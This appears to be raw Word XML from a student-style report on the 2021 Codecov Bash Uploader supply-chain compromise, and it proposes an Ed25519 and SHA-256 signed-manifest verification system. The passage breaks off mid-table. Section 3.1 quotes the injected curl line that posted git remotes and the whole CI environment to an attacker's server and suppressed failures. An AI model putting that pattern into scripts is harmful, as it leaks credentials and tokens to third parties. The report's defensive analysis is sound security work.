                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>, after a customer reported that the checksum of the downloaded script did not match the published value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Public disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>15 April 2021</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserv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Initial access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>An error in Codecov's Docker image creation process allowed the actor to extract a credential (an HMAC key for a Google Cloud Storage service account) that could modify the script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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Environment variables in affected CI environments (credentials, tokens, keys) and git remote URLs could be sent to a third-party server [1]. Customers had to rotate secrets. HashiCorp, for example, disclosed that its GPG release-signing key was exposed and rotated it [3].</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.4 Security Requirements Violated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 1.2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Security requirements violated</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Requirement</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How it was violated</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Integrity (primary)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>The distributed uploader was modified, and customers executed the modified file.</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Authentication / authenticity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Nothing proved to customers that the file came from Codecov's release process rather than from anyone holding a storage credential.</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Confidentiality</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CI secrets (tokens, keys, credentials) and git remote URLs were sent to a third party.</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Non-repudiation / accountability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>There was no signed, verifiable record binding each published file to an authorised release.</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Availability (secondary)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6576"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Affected organisations had to rotate credentials and audit pipelines, disrupting normal operations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.5 Objectives</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Analyse the documented Codecov incident: organisation, timeline, attack vector, vulnerabilities and violated requirements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Design a supply chain in which a customer verifies </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>both</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that an artifact is unmodified (SHA-256) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that the trusted vendor signed it (Ed25519).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Implement a working prototype in Python covering build and provenance, a signed manifest, key management with a revocation list, a customer verification engine, a CI/CD security gate, an audit log and a dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Safely reproduce the Codecov-style tampering and related attacks, and show that each one is blocked.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Validate the system with nine automated test cases and measure detection rate, false-acceptance rate and verification time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.6 Organisation of the Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 2 gives the abstract, and Chapter 3 describes the incident and the problem. Chapter 4 lists the requirements. Chapter 5, the core of the work, explains the design and implementation module by module. Chapter 6 analyses security using STRIDE. Chapter 7 reports the tests and attack simulations, and Chapter 8 discusses innovation and relevance. Chapter 9 concludes with limitations and future work, and Chapter 10 lists the references. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Documented facts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> about the incident are kept separate from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>our proposed solution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> throughout.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHAPTER 2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>ABSTRACT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>In 2021 an attacker used a credential exposed through an error in Codecov's Docker image build process to modify Codecov's Bash Uploader, a script that many organisations downloaded and ran inside their CI/CD pipelines. The change sent CI environment variables (typically tokens and keys) and git remote URLs to an external server. The file was served from Codecov's genuine location over HTTPS for about two months, and was noticed only when a customer compared its checksum with the published value.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">We designed and implemented a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Cryptographically Verified Software Supply Chain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that makes this attack fail automatically. On the vendor side, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>vendor/build.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> computes a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SHA-256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> digest of the artifact and generates </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SLSA-style build provenance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>vendor/sign.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> builds a release manifest (artifact, version, SHA-256, algorithms, signer, key ID, timestamp, provenance reference), canonicalises it and signs it with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ed25519</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>vendor/key_manager.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> handles key generation, fingerprints, rotation and a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>key revocation list (CRL)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. On the customer side, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>verifier/verify.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> runs a six-stage check before anything is deployed: manifest schema, CRL key status, zero-trust admission policy (trusted signer, allowed key IDs, revoked and minimum versions, approved source repository), Ed25519 signature, SHA-256 recomputation and provenance digest. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ci/security_gate.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> turns the verdict into exit code 0 (deploy) or 1 (block). Every decision is stored in an SQLite audit log and shown on a Flask dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>All nine required test cases pass, including the valid artifact, modified artifact, invalid signature, wrong key, revoked key, modified manifest, replay of an old version, unauthorised signer and a valid release signed with a new key. Seven of seven attack cases were blocked, a false-acceptance rate of 0 %, with a mean verification time of about 1.89 ms. Legitimate software is verified and deployed, while tampered software is detected and blocked.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Keywords:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> software supply-chain security, Codecov, Ed25519, SHA-256, signed manifest, key revocation, SLSA provenance, CI/CD security gate, STRIDE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHAPTER 3</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>PROBLEM STATEMENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.1 Incident Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>According to Codecov's security update [1], a third party periodically made unauthorised changes to the Bash Uploader from 31 January 2021. The actor gained access through an error in Codecov's Docker image creation process, which allowed extraction of the credential needed to modify the script. The modified script sent information from customers' CI environments to a server outside Codecov's infrastructure. The injected line was widely reported in the following form (IP address redacted):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curl -sm 0.5 -d "$(git remote -v)&lt;&lt;&lt;&lt;&lt;&lt; ENV $(env)" http://&lt;attacker-ip&gt;/upload/v2 || true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The line posts the repository's git remotes and the complete CI environment (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>$(env)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) to the attacker. The half-second timeout and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>|| true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensure the build never fails, so nothing looks unusual. On 1 April 2021 a customer noticed that the checksum of the downloaded script did not match the published one. Codecov remediated the script, rotated credentials and disclosed the incident on 15 April 2021, advising customers to rotate every credential exposed to affected CI runs [1]. Downstream disclosures such as HashiCorp's release-signing key exposure [3] show how one compromised tool fans out across many organisations [2].</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.2 Timeline of the Attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 3.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Timeline of the Codecov incident</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
